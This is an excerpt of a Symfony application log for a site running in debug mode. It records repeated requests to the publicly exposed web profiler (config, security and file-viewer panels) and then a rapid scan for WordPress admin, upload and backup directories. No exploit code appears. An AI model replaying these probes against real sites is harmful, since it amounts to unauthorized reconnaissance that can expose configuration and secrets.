  8629. [2025-12-20 23:10:18] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FWebServerBundle&line=0","method":"GET"} []
  8630. [2025-12-20 23:12:44] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FDebugBundle&line=0","method":"GET"} []
  8631. [2025-12-20 23:16:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7edbd1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7edbd1?panel=logger","method":"GET"} []
  8632. [2025-12-20 23:16:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  8633. [2025-12-20 23:17:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=config","method":"GET"} []
  8634. [2025-12-20 23:17:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8635. [2025-12-20 23:18:11] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6310fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6310fa/search/results?limit=10","method":"GET"} []
  8636. [2025-12-20 23:18:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
  8637. [2025-12-20 23:19:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
  8638. [2025-12-20 23:19:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
  8639. [2025-12-20 23:20:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42","method":"GET"} []
  8640. [2025-12-20 23:20:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  8641. [2025-12-20 23:20:22] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"17a8da","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/17a8da/search/results?ip=66.249.69.165&limit=10","method":"GET"} []
  8642. [2025-12-20 23:20:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.69.165&limit=10","method":"GET"} []
  8643. [2025-12-20 23:22:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"85806e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/85806e?panel=dump","method":"GET"} []
  8644. [2025-12-20 23:22:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  8645. [2025-12-20 23:23:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3b11a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3b11a?panel=twig","method":"GET"} []
  8646. [2025-12-20 23:23:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  8647. [2025-12-20 23:25:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=time","method":"GET"} []
  8648. [2025-12-20 23:25:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  8649. [2025-12-20 23:27:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=config","method":"GET"} []
  8650. [2025-12-20 23:27:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8651. [2025-12-20 23:33:22] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  8652. [2025-12-20 23:34:50] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  8653. [2025-12-20 23:35:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=swiftmailer","method":"GET"} []
  8654. [2025-12-20 23:35:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  8655. [2025-12-20 23:36:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=twig","method":"GET"} []
  8656. [2025-12-20 23:36:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  8657. [2025-12-20 23:38:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7fc15c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7fc15c","method":"GET"} []
  8658. [2025-12-20 23:38:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  8659. [2025-12-20 23:38:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=twig","method":"GET"} []
  8660. [2025-12-20 23:38:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  8661. [2025-12-20 23:39:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8a2fcc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8a2fcc?panel=security","method":"GET"} []
  8662. [2025-12-20 23:39:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  8663. [2025-12-20 23:45:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bfdac7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/bfdac7?panel=twig","method":"GET"} []
  8664. [2025-12-20 23:45:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  8665. [2025-12-20 23:51:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=config","method":"GET"} []
  8666. [2025-12-20 23:51:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8667. [2025-12-20 23:52:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=logger","method":"GET"} []
  8668. [2025-12-20 23:52:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  8669. [2025-12-20 23:57:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72","method":"GET"} []
  8670. [2025-12-20 23:57:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  8671. [2025-12-21 00:00:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  8672. [2025-12-21 00:00:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=validator","method":"GET"} []
  8673. [2025-12-21 00:00:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  8674. [2025-12-21 00:02:44] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=src%2FHona%2FAuthBundle&line=0","method":"GET"} []
  8675. [2025-12-21 00:04:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/images/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/images/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8676. [2025-12-21 00:04:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8677. [2025-12-21 00:04:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8678. [2025-12-21 00:04:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mini" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mini\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8679. [2025-12-21 00:04:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8680. [2025-12-21 00:04:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8681. [2025-12-21 00:04:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8682. [2025-12-21 00:04:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8683. [2025-12-21 00:04:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8684. [2025-12-21 00:04:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8685. [2025-12-21 00:04:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8686. [2025-12-21 00:04:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/themes/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/themes/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8687. [2025-12-21 00:04:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8688. [2025-12-21 00:04:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8689. [2025-12-21 00:04:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/ID3/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/ID3/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8690. [2025-12-21 00:04:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8691. [2025-12-21 00:04:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8692. [2025-12-21 00:04:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8693. [2025-12-21 00:04:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8694. [2025-12-21 00:04:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8695. [2025-12-21 00:04:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8696. [2025-12-21 00:04:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/certificates/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/certificates/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
